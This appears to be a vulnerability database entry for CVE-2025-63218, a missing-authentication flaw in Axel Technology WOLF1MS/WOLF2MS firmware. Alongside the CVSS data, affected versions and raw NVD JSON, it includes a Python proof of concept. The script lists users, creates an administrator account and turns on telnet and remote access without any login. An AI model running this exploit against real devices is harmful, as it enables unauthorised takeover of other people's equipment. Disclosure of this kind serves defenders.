CVE-2025-63218

Description

The Axel Technology WOLF1MS and WOLF2MS devices (firmware versions 0.8.5 to 1.0.3) are vulnerable to Broken Access Control due to missing authentication on the /cgi-bin/gstFcgi.fcgi endpoint. Unauthenticated remote attackers can list user accounts, create new administrative users, delete users, and modify system settings, leading to full compromise of the device.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:axeltechnology:wolf1ms_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:axeltechnology:wolf1ms:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:axeltechnology:wolf2ms_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:axeltechnology:wolf2ms:-:*:*:*:*:*:*:* - NOT VULNERABLE

Axel Technology WOLF1MS firmware 0.8.5

Axel Technology WOLF1MS firmware 0.8.6

Axel Technology WOLF1MS firmware 0.8.7

Axel Technology WOLF1MS firmware 0.8.8

Axel Technology WOLF1MS firmware 0.8.9

Axel Technology WOLF1MS firmware 0.9.0

Axel Technology WOLF1MS firmware 0.9.1

Axel Technology WOLF1MS firmware 0.9.2

Axel Technology WOLF1MS firmware 0.9.3

Axel Technology WOLF1MS firmware 0.9.4

Axel Technology WOLF1MS firmware 0.9.5

Axel Technology WOLF1MS firmware 0.9.6

Axel Technology WOLF1MS firmware 0.9.7

Axel Technology WOLF1MS firmware 0.9.8

Axel Technology WOLF1MS firmware 0.9.9

Axel Technology WOLF1MS firmware 1.0.0

Axel Technology WOLF1MS firmware 1.0.1

Axel Technology WOLF1MS firmware 1.0.2

Axel Technology WOLF1MS firmware 1.0.3

Axel Technology WOLF2MS firmware 0.8.5

Axel Technology WOLF2MS firmware 0.8.6

Axel Technology WOLF2MS firmware 0.8.7

Axel Technology WOLF2MS firmware 0.8.8

Axel Technology WOLF2MS firmware 0.8.9

Axel Technology WOLF2MS firmware 0.9.0

Axel Technology WOLF2MS firmware 0.9.1

Axel Technology WOLF2MS firmware 0.9.2

Axel Technology WOLF2MS firmware 0.9.3

Axel Technology WOLF2MS firmware 0.9.4

Axel Technology WOLF2MS firmware 0.9.5

Axel Technology WOLF2MS firmware 0.9.6

Axel Technology WOLF2MS firmware 0.9.7

Axel Technology WOLF2MS firmware 0.9.8

Axel Technology WOLF2MS firmware 0.9.9

Axel Technology WOLF2MS firmware 1.0.0

Axel Technology WOLF2MS firmware 1.0.1

Axel Technology WOLF2MS firmware 1.0.2

Axel Technology WOLF2MS firmware 1.0.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# CVE-2025-63218 PoC - Axel Technology WOLF1MS/WOLF2MS Broken Access Control
# Target: /cgi-bin/gstFcgi.fcgi endpoint

import requests
import sys
import json

def exploit(target_ip, target_port=80):
    base_url = f"http://{target_ip}:{target_port}"
    endpoint = "/cgi-bin/gstFcgi.fcgi"
    
    print(f"[*] Targeting {base_url}")
    print(f"[*] Exploiting CVE-2025-63218 - Missing Authentication\n")
    
    # Step 1: List all user accounts (No authentication required)
    print("[+] Step 1: Enumerating user accounts...")
    list_users_payload = {
        "action": "list_users",
        "module": "user_management"
    }
    
    try:
        response = requests.post(
            f"{base_url}{endpoint}",
            data=list_users_payload,
            timeout=10
        )
        print(f"[*] Response Status: {response.status_code}")
        print(f"[*] Users List: {response.text}")
    except Exception as e:
        print(f"[-] Error listing users: {e}")
    
    # Step 2: Create new admin user
    print("\n[+] Step 2: Creating new admin user...")
    create_user_payload = {
        "action": "create_user",
        "module": "user_management",
        "username": "hacker_admin",
        "password": "P@ssw0rd123!",
        "role": "administrator"
    }
    
    try:
        response = requests.post(
            f"{base_url}{endpoint}",
            data=create_user_payload,
            timeout=10
        )
        print(f"[*] Create User Response: {response.text}")
    except Exception as e:
        print(f"[-] Error creating user: {e}")
    
    # Step 3: Modify system settings
    print("\n[+] Step 3: Modifying system settings...")
    modify_settings_payload = {
        "action": "modify_settings",
        "module": "system_config",
        "settings": json.dumps({"remote_access": True, "telnet_enabled": True})
    }
    
    try:
        response = requests.post(
            f"{base_url}{endpoint}",
            data=modify_settings_payload,
            timeout=10
        )
        print(f"[*] Settings Modified: {response.text}")
    except Exception as e:
        print(f"[-] Error modifying settings: {e}")
    
    print("\n[!] Exploitation complete. Device may be fully compromised.")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip> [port]")
        sys.exit(1)
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    exploit(target, port)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-63218
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-63218
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-63218/
[4] VulDB https://vuldb.com/cve/CVE-2025-63218
[5] https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63218_Axel%20Technology%20WOLF1MS%20and%20WOLF2MS%20-%20Broken%20Access%20Control
[6] https://www.axeltechnology.com/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-63218", "sourceIdentifier": "[email protected]", "published": "2025-11-19T15:15:50.453", "lastModified": "2026-01-12T16:01:06.177", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Axel Technology WOLF1MS and WOLF2MS devices (firmware versions 0.8.5 to 1.0.3) are vulnerable to Broken Access Control due to missing authentication on the /cgi-bin/gstFcgi.fcgi endpoint. Unauthenticated remote attackers can list user accounts, create new administrative users, delete users, and modify system settings, leading to full compromise of the device."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-285"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:axeltechnology:wolf1ms_firmware:*:*:*:*:*:*:*:*", "versionStartIncluding": "0.8.5", "versionEndIncluding": "1.0.3", "matchCriteriaId": "6CD63D4E-079A-4F2F-A4DA-20D1FA44F0DB"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:axeltechnology:wolf1ms:-:*:*:*:*:*:*:*", "matchCriteriaId": "80DEC281-BE5E-42AC-875E-E4869D0AE8A0"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:axeltechnology:wolf2ms_firmware:*:*:*:*:*:*:*:*", "versionStartIncluding": "0.8.5", "versionEndIncluding": "1.0.3", "matchCriteriaId": "8703F9D9-8688-41D3-803C-6991085204BE"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:axeltechnology:wolf2ms:-:*:*:*:*:*:*:*", "matchCriteriaId": "B43485C9-4F82-4991-B22A-6C1F2ADD3214"}]}]}], "references": [{"url": "https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63218_Axel%20Technology%20WOLF1MS%20and%20WOLF2MS%20-%20Broken%20Access%20Control", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.axeltechnology.com/", "source": "[email protected]", "tags": ["Product"]}]}}